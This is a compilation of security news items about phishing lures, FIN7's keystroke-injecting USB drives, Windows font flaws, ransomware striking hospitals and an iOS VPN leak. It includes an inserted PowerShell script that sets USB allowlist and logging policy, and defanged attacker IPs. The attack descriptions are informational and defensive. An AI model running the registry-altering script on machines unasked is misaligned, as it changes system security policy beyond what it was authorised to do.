

Microsoft's Windows 10 Dockable 'News Bar' Now In Beta
29.3.2020  Bleepingcomputer  OS

Microsoft is releasing a new app for Windows 10 called the "Windows News Bar" that displays a docked bar containing news stories from Microsoft News and acts as a stock ticker for monitored stocks.

Previously spotted by Windows sleuth WalkingCat in February, the app's Microsoft Store page has recently been updated with screenshots of the actual program in use.

The News Bar is being developed through Microsoft News where they state that the offered news will be shown from over 4,500 news outlets.

"Microsoft's Windows News Bar works just like the Windows Taskbar. It's there when you need it, where you need it and how you need it. Customize its appearance in settings to find the experience that's just right for you. If you want to focus, don't worry, you can minimize the News Bar at any time and then bring it back when you're ready for it again", the Microsoft Store page reads.

Testing the Windows News Bar
When running, the News Bar will allow you to display a docked bar on the top, bottom, left, or right side of the screen that contains a continuously updated list of news stories based on your selected region.

BleepingComputer has tested the app and you can see the different ways the News Bar can be docked below. The bottom right picture also shows you how it looks with transparency enabled.

News Bar docked on bottom

News Bar docked on top

News Bar Images on right

News Bar images and text right transparent

When clicking on stories, the selected articles will be loaded in the default browser in Windows 10.

The News Bar settings will allow you to customize where the bar is docked, whether you wish to show images or text, and if the bar should be transparent.

News Bar Settings
The News Bar requires Windows 10 April 2018 Update or later and is currently in Beta. To install it, users need to 'Redeem a code', and it is not known when it will be publicly available.


FTC Warns VoIP Providers to Stop Facilitating Coronavirus Scams
29.3.2020  Bleepingcomputer  Spam

The US Federal Trade Commission (FTC) warned nine VoIP service providers against assisting and facilitating illegal robocalls designed to capitalize on public anxiety surrounding the Coronavirus pandemic.

"Many of these robocalls prey upon consumer fear of the pandemic to perpetrate scams or disseminate disinformation," the letters say. "FTC staff have reason to believe that one or more of your customers may be involved in such illegal telemarketing campaigns."

By March 30, the nine companies are required to email the FTC a description of the specific actions they have taken to ensure that their services are not used in Coronavirus-related telemarketing schemes that break the Telemarketing Sales Rule (TSR).

VoIP providers under scrutiny
FTC's legal staff sent letters to the following companies: Bluetone Communications LLC, Comet Media Inc, iFly Communications, J2 Web Services Inc, SipJoin Holding Corp, Third Rock Telecom, VoIPMax, VoIPTerminator Inc, and Voxbone US LLC.

The nine companies were also reminded of civil enforcement actions taken by the Department of Justice against VoIP providers and owners for "committing and conspiring to commit wire fraud by knowingly transmitting robocalls that impersonated federal government agencies."

The FTC also sued the Globex Telecom VoIP service providers and James B. Christiano's robocaller software companies as part of an effort to combat illegal telemarketing.

FTC's warning letters highlight several types of behavior that may infringe the TSR, including:

making a false or misleading statement to induce a consumer to buy something or contribute to a charity;
misrepresenting a seller or telemarketer’s affiliation with any government agency;
transmitting false or deceptive caller ID numbers;
initiating pre-recorded telemarketing robocalls, unless the seller has express written permission to call; and
initiating telemarketing calls to consumers whose phone numbers are on the National Do Not Call Registry, with certain exceptions.
"It’s never good business for VoIP providers and others to help telemarketers make illegal robocalls that scam people," FTC Bureau of Consumer Protection Director Andrew Smith said.

"But it’s especially bad when your company is helping telemarketers exploiting fears about the coronavirus to spread disinformation and perpetrate scams."

If you get COVID-19-related scam robocalls the FTC says that you should:

Hang up. Don’t press any numbers. The recording might say that pressing a number will let you speak to a live operator or remove you from their call list, but it might lead to more robocalls, instead.
Consider using a call blocking app or device. You also can ask your phone provider if it has call-blocking tools. To learn more, go to ftc.gov/calls.
Report the call. Report robocalls at ftc.gov/complaint. The more we hear from you, the more we can help fight scams.
Warnings sent for selling fake Coronavirus cures
The FTC and U.S. Food and Drug Administration (FDA) also sent warning letters to companies that were offering various products for sale — such as teas, essential oils, and colloidal silver — in the United States, products that were promoted as capable of mitigating, preventing, treating, curing, or diagnosing the COVID-19 disease in people.

The two government agencies sent the letters to the following companies: Vital Silver, Quinessence Aromatherapy Ltd, N-ergetics, GuruNanda LLC, Vivify Holistic Clinic, Herbal Amy LLC, and The Jim Bakker Show.

"Within 48 hours, please send an email to COVID-19-Task-Force-CFSAN@fda.hhs.gov describing the specific steps you have taken to correct these violations," the letters say. "Failure to immediately correct the violations cited in this letter may result in legal action, including, without limitation, seizure and injunction."

"These warning letters are just the first step," FTC Chairman Joe Simons said. "We’re prepared to take enforcement actions against companies that continue to market this type of scam."

"The FDA considers the sale and promotion of fraudulent COVID-19 products to be a threat to the public health," FDA Commissioner Stephen M. Hahn added. "We have an aggressive surveillance program that routinely monitors online sources for health fraud products, especially during a significant public health issue such as this one."

Both the FTC and the FDA are continuing to monitor online marketplaces, social media, and consumer complaints to ensure that other companies do not market fraudulent products under other names or via other websites.

Europol also announced last week that a huge amount of counterfeit medicine and COVID-19 outbreak-related protective gear was seized in a global anti-trafficking operation dubbed Operation Pangea, coordinated by INTERPOL.

"Authorities around the world seized nearly 34 000 counterfeit surgical masks, making them the most commonly sold medical product online," according to Europol. "Law enforcement officers identified more than 2 000 links to products related to COVID-19."


US Small Business Administration Grants Used as Phishing Bait
29.3.2020  Bleepingcomputer  Phishing

Attackers are attempting to deliver Remcos remote access tool (RAT) payloads on the systems of small businesses via phishing emails impersonating the U.S. Small Business Administration (U.S. SBA).

They are taking advantage of the financial problems experienced by SMBs during the current COVID-19 pandemic to lure them into opening malicious attachments camouflaged as disaster assistance grants and testing center vouchers.

Despite using broken English within the phishing emails, the malicious actors made sure that the overall layout is as close as possible to the real thing, using the official U.S. SBA logo and footer info, as IBM X-Force Threat Intelligence researchers found.

"The victim is presented with an application number and is urged to complete the application before March 25th," they say. "In order to do this, victims are requested to sign the attached form and upload it to the SBA website."

Also, since the attackers' method of asking for grant information is identical to the process used by the real U.S. SBA, some SMBs might fall for this trick and open the malicious attachment.

Phishing email sample (IBM X-Force)
Delivering the Remcos RAT
Remcos RAT, the final payload, is delivered via an overly complicated infection chain involving an .IMG file containing an .ISO image that drops a malicious PDF document.

The PDF will then drop and execute a VBS script that downloads and launches the Remcos RAT from a Google CDN after saving it on the victim's device as Brystbenene6.exe.

Once Remcos is installed on the target's computer, the attackers gain full control over the machine which allows them to steal sensitive information like user credentials and browser cookies.

The operators behind this campaign can also download, upload, and execute malicious code and VBS scripts, take screenshots, steal clipboard contents, use the compromised machines as proxies for other malicious purposes, and automate any of these tasks.

Infection chain (IBM X-Force)
"Currently, there are a large number of companies facing severe financial complications due to the coronavirus outbreak," the researchers explain.

"It is not uncommon for those businesses to apply for governmental help from the SBA, which makes them especially susceptible to these kinds of malware campaigns."

Economic stimulus: the perfect bait
The campaign's timing is ideal for the attackers: small business owners are eagerly waiting for information about the loans or other help they could receive to survive the pandemic, given the economic stimulus checks being considered by the U.S. Government.

A week ago, FBI's Internet Crime Complaint Center (IC3) warned of ongoing phishing attacks that use fake government economic stimulus checks as a lure to steal personal information from potential victims.

"Look out for phishing emails asking you to verify your personal information in order to receive an economic stimulus check from the government," IC3's alert said.

"While talk of economic stimulus checks has been in the news cycle, government agencies are not sending unsolicited emails seeking your private information in order to send you money."

The FBI issued a similar warning about scammers impersonating the Internal Revenue Service (IRS) in 2008 while trying to steal taxpayers' sensitive information using, again, economic stimulus checks as bait.


FBI: Hackers Sending Malicious USB Drives & Teddy Bears via USPS
29.3.2020  Bleepingcomputer  BigBrothers  Virus

Hackers from the FIN7 cybercriminal group have been targeting various businesses with malicious USB devices acting as a keyboard when plugged into a computer. Injected commands download and execute a JavaScript backdoor associated with this actor.

In a FLASH alert on Thursday, the FBI warns organizations and security professionals about this tactic adopted by FIN7 to deliver GRIFFON malware.

The attack is a variation of the "lost USB" ruse that penetration testers have used quite successfully in their assessments for years; one such incident was analyzed by researchers at Trustwave.

One client of the cybersecurity company received a package, allegedly from Best Buy, with a loyalty reward in the form of a $50 gift card. In the envelope was a USB drive claiming to contain a list of products eligible for purchase using the gift card.


This is not a one-off incident, though.

The FBI warns that FIN7 has mailed these packages to numerous businesses (retail, restaurant, hotel industry) where they target employees in human resources, IT, or executive management departments.

"Recently, the cybercriminal group FIN7, known for targeting such businesses through phishing emails, deployed an additional tactic of mailing USB devices via the United States Postal Service (USPS). The mailed packages sometimes include items like teddy bears or gift cards to employees of target companies working in the Human Resources (HR), Information Technology (IT), or Executive Management (EM) roles," the FBI alert states.

The FBI says that the malicious drive is configured to emulate keystrokes that launch a PowerShell command to retrieve malware from a server controlled by the attacker. Then, the USB device contacts domains or IP addresses in Russia.

The days when USB flash drives were just for storage are long gone. Several development boards (Teensy, Arduino) can now be programmed to emulate a human interface device (HID) such as a keyboard or mouse and to replay a pre-configured set of keystrokes that drops malicious payloads. These are called HID or USB drive-by attacks; they are easy to pull off and don't cost much.

Trustwave analyzed this malicious USB activity and noticed two PowerShell commands that lead to showing a fake error for the thumb drive and ultimately to running third-stage JavaScript that can collect system information and download other malware.


To better summarize the attack flow, the researchers created the image below, which clarifies the stages of the compromise that lead to deploying malware of the attacker’s choice.

The FBI alert states that after the reconnaissance phase the threat actor starts to move laterally, seeking administrative privileges.


FIN7 uses multiple tools to achieve its goal; the list includes Metasploit, Cobalt Strike, PowerShell scripts, Carbanak malware, the Griffon backdoor, the Boostwrite malware dropper, and the RdfSniffer module with remote access capabilities.

BadUSB attacks, demonstrated by security researcher Karsten Nohl in 2014, are now common in penetration testing and multiple alternatives exist these days. The more versatile ones sell for $100.

FIN7 went with a simple and cheap version, though, that costs between $5 and $14, depending on the supplier and the shipping country. The FBI notes in its alert that the microcontroller is an ATMEGA24U, while the one seen by Trustwave had an ATMEGA32U4.

However, both variants had "HW-374" printed on the circuit board and are identified as an Arduino Leonardo, which is specifically programmed to act as a keyboard/mouse out of the box. Customizing the keystrokes and mouse movements is possible using the Arduino IDE.


Connecting unknown USB devices to a workstation is a well-known security risk but it is still disregarded by many users.

Organizations can take precautions against attacks via malicious USB drives by allowing only vetted devices based on their hardware ID and denying all others.

Furthermore, updating PowerShell and enabling logging (the larger the log size, the better) can help determine the attack vector and the steps leading to compromise.
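The two precautions above, as an added example that is not part of the FBI alert or Trustwave's write-up: a PowerShell script that writes the Group Policy registry equivalents for a hardware-ID device allowlist and for PowerShell script block, module and transcription logging on a single host, then enlarges the PowerShell Operational log. The function names, the transcript directory and the hardware IDs are assumptions; the IDs in particular are placeholders to be replaced with those of vetted devices.

```powershell
#Requires -RunAsAdministrator
# Added example, not from the FBI alert or Trustwave's analysis.
# Run in an elevated session. On domain-joined hosts, deploy the same values
# through Group Policy rather than writing the local registry directly.

function Set-UsbAllowlist {
    param(
        # PLACEHOLDER hardware IDs: copy the real values from Device Manager >
        # Details > Hardware Ids of each device the organization has vetted.
        [string[]]$AllowedHardwareIds = @(
            'USB\VID_0000&PID_0000',   # placeholder: approved keyboard model
            'USB\VID_0000&PID_0001'    # placeholder: approved storage device
        )
    )
    $base = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\DeviceInstall\Restrictions'
    New-Item -Path "$base\AllowDeviceIDs" -Force | Out-Null

    # "Allow installation of devices that match any of these device IDs":
    # the policy value enables the list, the subkey holds one ID per entry.
    Set-ItemProperty -Path $base -Name 'AllowDeviceIDs' -Value 1 -Type DWord
    $i = 1
    foreach ($id in $AllowedHardwareIds) {
        Set-ItemProperty -Path "$base\AllowDeviceIDs" -Name ([string]$i) -Value $id -Type String
        $i++
    }
    # "Prevent installation of devices not described by other policy settings":
    # a newly plugged-in device whose ID is not on the list, such as a
    # microcontroller board presenting itself as a keyboard, is refused.
    Set-ItemProperty -Path $base -Name 'DenyUnspecified' -Value 1 -Type DWord
}

function Enable-PowerShellLogging {
    param([string]$TranscriptDir = 'C:\PSTranscripts')   # assumed local path
    $ps = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell'

    # Script block logging writes the de-obfuscated text of every script block
    # as event 4104 in Microsoft-Windows-PowerShell/Operational, so a command
    # injected by an emulated keyboard is recorded even when it is encoded.
    New-Item -Path "$ps\ScriptBlockLogging" -Force | Out-Null
    Set-ItemProperty -Path "$ps\ScriptBlockLogging" -Name 'EnableScriptBlockLogging' -Value 1 -Type DWord

    # Module logging for all modules (event 4103, pipeline execution details).
    New-Item -Path "$ps\ModuleLogging\ModuleNames" -Force | Out-Null
    Set-ItemProperty -Path "$ps\ModuleLogging" -Name 'EnableModuleLogging' -Value 1 -Type DWord
    Set-ItemProperty -Path "$ps\ModuleLogging\ModuleNames" -Name '*' -Value '*' -Type String

    # Session transcripts with invocation headers give a timestamped record of
    # every command, useful for reconstructing the steps that led to compromise.
    New-Item -Path "$ps\Transcription" -Force | Out-Null
    Set-ItemProperty -Path "$ps\Transcription" -Name 'EnableTranscripting' -Value 1 -Type DWord
    Set-ItemProperty -Path "$ps\Transcription" -Name 'EnableInvocationHeader' -Value 1 -Type DWord
    Set-ItemProperty -Path "$ps\Transcription" -Name 'OutputDirectory' -Value $TranscriptDir -Type String

    # The larger the log, the longer the evidence survives: raise the
    # Operational log to 1 GiB so 4104 events are not overwritten before
    # an investigation can collect them.
    wevtutil.exe sl 'Microsoft-Windows-PowerShell/Operational' /ms:1073741824
}

Set-UsbAllowlist
Enable-PowerShellLogging
```

The device allowlist is enforced at driver-installation time, so devices that were already installed before the policy was set are not affected by it.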


Google Advises Against Disabling Sites During the Pandemic
29.3.2020  Bleepingcomputer  Security

Google warns businesses against disabling their websites during the COVID-19 pandemic and, instead, recommends limiting their functionality to avoid being penalized in Google Search results.

The guidance published by Google Webmaster Trends Analyst John Mueller answers questions from businesses who might want to pause their online business and reduce the impact in Google Search.

"These recommendations are applicable to any business with an online presence, but particularly for those who have paused the selling of their products or services online," Mueller explained.

Limit your site's functionality
Google's recommendation is to avoid completely shutting down a website if at all possible, even when employees' work-from-home schedules during coronavirus lockdowns don't allow them to keep it updated.

This approach should be followed especially in cases where a company's online business is expected to pick up again, according to Mueller.

Limiting a site's functionality allows webmasters to cut down any negative effects on Google Search results stemming from the website's reduced presence for a given period of time.

Website owners and admins are advised to take one or more of the following measures rather than shutting down their sites:

• Disable the cart functionality: This is the simplest approach, which won't change anything for a site's Search visibility.
• Tell customers what's going on: Use a banner to let your customers know of the changes the business and the site are going through.
• Update the site's structured data: Keep product availability information up to date.
• Check the Merchant Center feed: Follow best practices for availability attributes listed in the Merchant Center.
• Tell Google you changed things: Ask Google to recrawl your website using sitemaps or the Search Console.

"This is the recommended approach since it minimizes any negative effects on your site's presence in Search," Mueller added.

"People can still find your products, read reviews, or add wishlists so they can purchase at a later time."

Disable sites for a very limited time only
If you can't follow the recommended approach of limiting your site's functionality to cope with the lull in orders or the decrease in update capability, there are options to reduce the impact of a full site takedown.

"This is an extreme measure that should only be taken for a very short period of time (a few days at most), as it will otherwise have significant effects on the website in Search, even when implemented properly," Mueller explained.

"Keep in mind that your customers may also want to find information about your products, your services, and your company, even if you're not selling anything right now."

Here are the options you have in this situation:

• To urgently disable the site for 1-2 days: return an informational error page with a 503 HTTP result code instead of all content. Make sure to follow the best practices for disabling a site.
• To disable the site for a longer time: provide an indexable homepage as a placeholder for users to find in Search by using the 200 HTTP status code.
• To quickly hide your site in Search (while considering the options): temporarily remove it from Search.

Side effects after disabling sites
Among the side effects of disabling your site, webmasters will notice Knowledge Panels losing information, Search Console verification failing, and loss of business info in Search results.

Customers will also have trouble finding first-hand accurate information in Google Search and will need to rely on info from third-party web resources.

To top it all off, once a website goes down without notification, customers will have no way of knowing why it happened.

Google Webmasters (@googlewmc), 7:47 PM - Mar 26, 2020:

"⚡️⚡️⚡️ Do you need to hit pause on your online business for some time? We just published some do's and don't's to help you with maintaining your site's presence in search. Check it out! ⚡️⚡️⚡️ https://webmasters.googleblog.com/2020/03/how-to-pause-your-business-online-in.html"

Webmasters can also tell Google, via Search Console, to crawl their sites less frequently while functionality is limited, but they shouldn't block any specific region from accessing their online businesses, temporarily or otherwise.

"We hope that with this information, you're able to have your online business up & running quickly when that time comes," Mueller concluded.

"Should you run into any problems or questions along the way, please don't hesitate to use our public channels to get help."


Actively Exploited Windows Font Parsing Bugs Get Temporary Fix
29.3.2020  Bleepingcomputer  Exploit

Until Microsoft releases a patch for two critical vulnerabilities affecting the font parsing component in all supported versions of Windows, some users can apply temporary protection in the form of a micropatch that prevents exploitation.

The two flaws affect the Adobe Type Manager Library (maintained by Microsoft) and are in the ATMFD.DLL font driver that processes Adobe Type 1 PostScript and OpenType fonts.

Leveraging them on systems earlier than Windows 10 can lead to remote code execution with elevated privileges. Microsoft is aware of threat actors exploiting them in targeted attacks on older versions of the operating system.

Works against remote attackers
A micropatch that mitigates the risk of exploitation is available for Windows 7 64-bit and Windows Server 2008 R2 systems that do not benefit from Microsoft's Extended Security Updates (ESU). It is delivered automatically through the 0Patch platform - for both paying and non-paying users - and can be applied without rebooting the machine.

Thus, for the time being, Microsoft's least supported operating system is the only one getting a temporary fix for the font parsing bugs the company disclosed on March 23.

In Windows 10 v1709, font parsing happens in an isolated space, making exploitation more difficult. On earlier versions, though, this happens in the kernel, providing attackers an opportunity to run code with the highest privileges.

The 0Patch fix will become available for Windows 7 and Windows Server 2008 R2 with ESU, Windows 8.1 and Windows Server 2012, both 32-bit and 64-bit.

It should be noted that these vulnerabilities can be exploited by a remote adversary and this threat vector is what the micropatch protects against. A local attacker can bypass the 0Patch fix by writing code that makes system calls to the kernel.

Visible effects
In a blog post on Thursday, Mitja Kolsek, CEO of Acros Security, the company behind 0Patch, provides the full code of the micropatch and explains how it works.

"With this micropatch in place, all applications using Windows GDI for font-related operations will find any Adobe Type 1 PostScript fonts rendered invalid and unable to load," Mitja Kolsek wrote.

Basically, Windows Explorer will no longer show a preview of .PFM and .PFB font files after applying the temporary fix. The glyphs won't be rendered in the Preview Pane, as thumbnails, or in the Details Pane.

Other font types that are not parsed with the vulnerable component remain unaffected.


Microsoft has provided three workarounds that can mitigate the problem, each with its advantages and disadvantages:

Workaround: Disable the Preview Pane and Details Pane in Windows Explorer
Applicability: Works on all systems but won't mitigate the issue if you open a document with the vulnerable font class

Workaround: Disable the WebClient service
Applicability: Works on all systems but won't mitigate the issue if you open a document with the vulnerable font class

Workaround: Rename ATMFD.DLL
Applicability: Only works on older systems (before Windows 10) but completely mitigates the issue, though it can introduce usability issues in rare cases

Below is a video showing how Windows behaves with and without the micropatch from 0Patch:


Russian-Speaking Hackers Attack Pharma, Manufacturing Companies in Europe
29.3.2020  Bleepingcomputer  BigBrothers

Malware belonging to Russian-speaking threat actors was used in attacks in late January against at least two European companies in the pharmaceutical and manufacturing industries.

Based on the tools employed in the attacks, the suspects are likely the Silence and TA505 financially-motivated groups.

While TA505's history of attacks includes targets in the medical sector, if security researchers are right, these incidents would mark a departure for Silence from its regular targets, which are banks and financial institutions.

Clean IPs for command and control
The first malware samples used in these attacks emerged on the VirusTotal scanning platform on February 2, identified as Silence.ProxyBot and updated versions of Silence.MainModule.

Both samples are associated with Silence, a group that started in 2016 targeting banks in the former Soviet Union territory, later expanding their attack region globally. The activity of this threat actor has been described in two reports (1, 2) from Group-IB, a Singapore-based cyber security company.

Looking at the malware samples, researchers at Group-IB identified at least two victims in Belgium and Germany, both receiving the necessary information to stop the attackers’ progress.

The analysis revealed two IP addresses used for command and control activity. One is from the Czech Republic (195.123.246[.]126 - active since late January) and the other from Denmark (37.120.145[.]253); neither has a history of malicious trails, being marked as clean by multiple security services.

Checking the cybercriminal infrastructure showed that the attacker leveraged two vulnerabilities (CVE-2019-1405 and CVE-2019-1322) in Windows 10 and earlier versions that allow local privilege escalation. The exploit was embedded in an executable named 'comahawk.exe'.

TA505's contribution to the attacks became visible after the researchers found a TinyMet Meterpreter stager, associated with this adversary in the past and compressed with the group's custom packer.

The link between Silence and TA505 is not new. Group-IB in 2019 reported that the two actors likely used tools (Silence.Downloader and FlawedAmmyy.Downloader) developed by the same individual.

Furthermore, the company’s incident response team discovered in late 2019 that Silence compromised at least one bank in Europe with the help of TA505, who provided access to the target network.

Ransomware attack suspected
Moving from banks and financial institutions to pharma and manufacturing companies is an odd move for the Silence gang, which has specialized in breaching financial organizations.

How the attackers managed to compromise the latest targets and the damage caused remains unknown at this point, as the researchers only found tools used for lateral movement.

Rustam Mirkasymov, the head of the Dynamic Malware Analysis team at Group-IB, says that the purpose of the attack might have been either a ransomware infection or a complex supply-chain attack.

If ransomware was the end game, TA505 is known to have deployed at least three strains in the past - Locky, Rapid, and Clop. However, the final payload in these recent cases could not be identified because the intrusion was stopped at an intermediary stage, Mirkasymov told BleepingComputer.

The expert assesses with moderate confidence that Silence is behind these activities, although he does not exclude the possibility that the group’s tools were sold to another threat actor or borrowed by TA505.

"Slight modifications of Silence.ProxyBot and Silence.MainModule can be explained by the gang's attempts to avoid detection as a result of being in the spotlight of security researchers for some time now," Rustam Mirkasymov said.


Google Warned Users of 40,000 State-Sponsored Attacks in 2019
29.3.2020  Bleepingcomputer  BigBrothers

Google says that it delivered almost 40,000 alerts of state-sponsored phishing or malware hacking attempts to its users during 2019, a 25% drop compared with the previous year.

One of the reasons behind this notable drop in the number of government-backed hacking incidents is the increasingly effective protections Google sets up to protect its users.

Due to the more effective protections, hackers are forced to slow down their attacks and try to adapt their campaigns which leads to less frequent hacking attempts.

Journalist and news outlet impersonation were among the most frequently identified phishing methods used by state-backed hackers during 2019 according to Toni Gidwani, a Security Engineering Manager with Google’s Threat Analysis Group (TAG).

Government-backed phishing targets (Google)
"For example, attackers impersonate a journalist to seed false stories with other reporters to spread disinformation," he said.

"In other cases, attackers will send several benign emails to build a rapport with a journalist or foreign policy expert before sending a malicious attachment in a follow-up email."

All Advanced Protection Program users protected from phishing
"We’ve yet to see people successfully phished if they participate in Google’s Advanced Protection Program (APP), even if they are repeatedly targeted," Gidwani explained.

"APP provides the strongest protections available against phishing and account hijacking and is specifically designed for the highest-risk accounts."

Google's APP is a program designed to allow high-risk or regular users to defend their accounts from state-sponsored spear-phishing attempts using a more secure login procedure that requires them to use smartphones or security keys to verify their identity.

APP works by limiting the third-party apps and sites that can access a user's data and by blocking malicious actors from impersonating the account's owner to take over the account, with the help of additional identity checks.

Google recommends enrolling in APP to anyone at risk of targeted online attacks including but not limited to business leaders, journalists, activists, and IT administrators.

Users can learn more about how to sign up for Google's Advanced Protection Program here.

"With attacks on the rise, and many major events on the horizon this year like the U.S. elections in November, the Advanced Protection Program offers a simple way to incorporate the strongest account protection that Google offers," Google Advanced Protection Program PM Shuvo Chatterjee said in January.

Attacks leveraging zero-days
Zero-day vulnerabilities were also among the favorite weapons identified by Google's TAG during 2019, used in targeted campaigns: multiple 0-days were delivered via spearphishing emails, watering hole attacks, and links to malicious attacker-controlled sites.

In one instance, TAG researchers were able to spot five different zero-days used by a single threat actor within a really short time frame, something that rarely happens.

"TAG actively hunts for these types of attacks because they are particularly dangerous and have a high rate of success, although they account for a small number of the overall total," Gidwani added.

Sectors targeted by SANDWORM (Google)
Additionally, "government-backed attackers continue to consistently target geopolitical rivals, government officials, journalists, dissidents and activists."

For instance, Google tracked the SANDWORM Russian-backed threat group's targeting efforts (by industry sector) during the last three years and plotted their attacks in the table embedded above.


Ryuk Ransomware Keeps Targeting Hospitals During the Pandemic
29.3.2020  Bleepingcomputer  Ransomware

The Ryuk Ransomware operators continue to target hospitals even as these organizations are overwhelmed during the Coronavirus pandemic.

Last week BleepingComputer contacted various ransomware groups and asked if they would target hospitals and other healthcare organizations during the pandemic.

With the amount of strain healthcare organizations are under during this pandemic, I was hoping that ransomware operators would avoid these organizations so they can focus on treating people.

Of the seven ransomware operators I contacted, only Maze and DoppelPaymer responded that they would no longer target hospitals.

Since then, Maze has released the data stolen from a drug testing company that was encrypted before the group stated it would not target healthcare. They continue to tell BleepingComputer that they will not encrypt hospitals or other healthcare organizations during the pandemic.

Ryuk never responded and continues to target hospitals
One of the ransomware operations we contacted was Ryuk who never responded to our question.

Since then, BleepingComputer has learned that Ryuk continues to target hospitals even while they are struggling to keep people alive during the Coronavirus pandemic.

For example, just this morning PeterM of Sophos tweeted that a US health care provider was attacked and encrypted overnight by Ryuk.


When asked if there were any indicators of compromise (IOCs) that could be shared, he stated it looked like every other Ryuk attack.

"Looks like a typical Ryuk attack at the moment, they deployed the ransomware with PsExec," PeterM stated.

In a conversation with BleepingComputer, Vitali Kremez, Head of SentinelOne's research division, said that over the past month he has seen Ryuk targeting 10 healthcare organizations. Of these ten targets, two are independent hospitals and another is a healthcare network of 9 hospitals in the USA.

"Not only has their healthcare targeting not stopped but we have also seen a continuous trend of exploiting healthcare organizations in the middle of the global pandemic. While some extortionist groups at least acknowledged or engaged in the discourse of stopping healthcare extortionists, the Ryuk operators remained silent pursuing healthcare targeting even in light of our call to stop," Kremez told BleepingComputer.

BleepingComputer was informed that one of the hospitals is located in a state that is being heavily affected by the Coronavirus at this time.

At any time, but even more so now, encrypting a hospital's data not only affects the ability of a doctor to carry out their job but also whether a patient may live or die.

With everything our medical professionals are dealing with around the world, all people, including ransomware actors, need to give them the space to do their jobs rather than hindering it.


Windows 10 Search Getting New Features for Business Customers
29.3.2020  Bleepingcomputer  OS

Microsoft developers are currently working on adding the Microsoft Search offering to the Windows 10 search boxes of Office 365 enterprise customers.

The new feature is in development and Microsoft says that it should arrive on users' desktops sometime during this year's fourth quarter.

"We're bringing Microsoft Search to the Windows 10 search box," the update's Microsoft 365 roadmap entry reads.

"Microsoft Search is an enterprise search experience that increases productivity and saves time by delivering more relevant search results for your organization."

Microsoft 365 search in Windows 10
According to Redmond's support website, Microsoft Search can help users search across Microsoft 365 and get results from multiple Office 365 data sources including SharePoint, Microsoft OneDrive for Business, and Microsoft Exchange Server.

Microsoft Search is also designed to make result suggestions based on the customer's Office 365 activity and to make pinpointing shared files a lot easier.

"Microsoft Search is on by default and any administration you do applies to Microsoft Search in all the apps," Microsoft explains.

Once Microsoft Search is brought to the Windows 10 search box, users will be able to find content stored by their organization within Microsoft 365 or indexed via connectors.

Microsoft highlights the following among the potential benefits of having Microsoft Search support brought to the Windows 10 search box:

• Users get results that are relevant in the context of the app they search from. For example, when they search in Microsoft Outlook, they find emails, and not SharePoint sites. When they search in SharePoint, they find sites, pages, and files.
• Whichever app users are working in, Microsoft Search is personal. Microsoft Search uses insights from the Microsoft Graph to show results that are relevant to each user. Each user might see different results, even if they search for the same words. They only see results that they already have access to; Microsoft Search doesn’t change permissions.
• Users don’t need to remember where the information is located. For example, a user is working in Microsoft Word and wants to reuse information from a presentation that a colleague shared from their OneDrive. There’s no need to switch to OneDrive and search for that presentation, they can simply search from Word.
• When in Bing, users get results from within their organization in addition to the public web results.
The Microsoft Search extension for Chrome fiasco
In late January, Microsoft previously tried to forcibly deploy the 'Microsoft Search in Bing quick access' Google Chrome extension for some Office 365 ProPlus users.

This would have forced the browser to use Bing as the default search engine, helping the Office 365 customers to "access relevant workplace information directly from the browser address bar."

At the time, the company said that it was planning to roll out the extension starting in mid-February to enterprise customers running Office 365 ProPlus, Version 2002, through the targeted monthly channel.

Microsoft Search in Bing welcome screen (Microsoft)
However, following users' outrage, Microsoft decided to backpedal on its decision a few weeks later, in February, pausing the rollout and saying that "administrators will be able to opt in to deploy the browser extension."

"In the near term, Office 365 ProPlus will only deploy the browser extension to AD-joined devices, even within organizations that have opted in," Microsoft said. "In the future, we will add specific settings to govern the deployment of the extension to unmanaged devices."


New Windows 10 Bug Causes Internet Connectivity Issues, Fix in April
29.3.2020  Bleepingcomputer  OS

All supported Windows 10 and Windows Server versions are affected by a new bug that could cause applications to be unable to connect to the Internet.

According to a new post by Microsoft, when a Windows user is using a manual or auto-configured proxy, they may have issues connecting to the Internet with applications that utilize the WinHTTP or WinInet Windows networking APIs. This bug has a greater chance of affecting VPN users.

"Devices using a manual or auto-configured proxy, especially with a virtual private network (VPN), might show limited or no internet connection status in the Network Connectivity Status Indicator (NCSI) in the notification area. This might happen when connected or disconnected to a VPN or after changing state between the two. Devices with this issue, might also have issues reaching the internet using applications that use WinHTTP or WinInet. Examples of apps that might be affected on devices in this state are as follows but not limited to Microsoft Teams, Microsoft Office, Office365, Outlook, Internet Explorer 11, and some version of Microsoft Edge."

Microsoft has stated that popular applications that rely on the affected APIs include Outlook, Microsoft Office, and Microsoft Teams.

This bug affects all supported Windows 10 and Windows Server versions, from version 1709 to 1909.

Microsoft says affected users may be able to resolve the issue by rebooting their computer.

An out-of-band (OOB) update to fix this issue is being targeted for release in early April.


Unpatched iOS Bug Blocks VPNs From Encrypting All Traffic
29.3.2020  Bleepingcomputer  Apple

A currently unpatched security vulnerability affecting iOS 13.3.1 or later prevents virtual private networks (VPNs) from encrypting all traffic and can lead to some Internet connections bypassing VPN encryption to expose users' data or leak their IP addresses.

While connections made after connecting to a VPN on your iOS device are not affected by this bug, all previously established connections will remain outside the VPN's secure tunnel as ProtonVPN disclosed.

This VPN bypass vulnerability (rated with a 5.3 CVSS v3.1 base score) was discovered by a security consultant who is part of the Proton community and was disclosed by ProtonVPN to make users and other VPN providers aware of the issue.

Connections remain open and exposed
The bug is due to Apple's iOS not terminating all existing Internet connections when the user connects to a VPN, and not having them automatically reconnect to the destination servers through the tunnel once it is established.

"Most connections are short-lived and will eventually be re-established through the VPN tunnel on their own," ProtonVPN explains. "However, some are long-lasting and can remain open for minutes to hours outside the VPN tunnel."

During the time the connections are outside of the VPN secure communication channels, this issue can lead to serious consequences.

For instance, user data could be exposed to third parties if the connections are not encrypted themselves, and IP address leaks could potentially reveal the users' location or expose them and destination servers to attacks.

Exposed connections to Apple servers (ProtonVPN)

Even though users should only see traffic being exchanged between their devices, local IP addresses, and the VPN's servers, other IP addresses (Apple server IPs in the screenshot above) will also show up because previously opened connections were not terminated before the VPN connected.

While ProtonVPN says that Apple's push notifications are a good example of a process using connections to Apple servers that won't be closed automatically, this bug can affect any service or app running on the user's iOS device, from web beacons to instant messaging applications.

"Those at highest risk because of this security flaw are people in countries where surveillance and civil rights abuses are common," ProtonVPN says.

"Neither ProtonVPN nor any other VPN service can provide a workaround for this issue because iOS does not permit a VPN app to kill existing network connections."

ProtonVPN
@ProtonVPN
